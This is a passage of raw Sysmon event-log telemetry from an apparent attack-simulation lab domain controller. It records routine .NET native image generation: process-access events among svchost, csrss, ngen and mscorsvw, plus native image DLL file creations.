Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.380{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3504-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.364{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3504-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.364{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3504-00000000CF01}7104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:03.333{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f00-0\napinit.dll2021-06-23 21:05:03.333 10341000x800000000000000021276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.239{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.224{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.224{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3404-00000000CF01}3840C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.161{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3304-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.131{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3304-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.131{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3304-00000000CF01}6728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021270Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:03.114{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1970-0\napcrypt.dll2021-06-23 21:05:03.098 10341000x800000000000000021269Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.051{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021268Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:03.020{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021267Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:03.020{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FF-60D3-3204-00000000CF01}6512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021312Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.942{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3D04-00000000CF01}5748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021311Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.926{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3D04-00000000CF01}5748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021310Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.926{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3D04-00000000CF01}5748C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021309Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.880{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19fc-0\PresentationFramework-SystemDrawing.dll2021-06-23 21:05:04.880 23542300x800000000000000021308Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.833{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDF787ADEFE465139F8F5031AB3D2F25,SHA256=DB862E9CB84C4D404430309F86D8A75D709C8B7084E3344C97FBDDD702D3710A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021307Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.770{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.755{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.755{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3C04-00000000CF01}6652C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.723{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A200-60D3-3B04-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:04.708{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A200-60D3-3B04-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:04.708{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A200-60D3-3B04-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:04.630{4DB9351A-A200-60D3-3A04-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18c4-0\PresentationFramework-SystemData.dll2021-06-23 21:05:04.630 10341000x800000000000000021300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
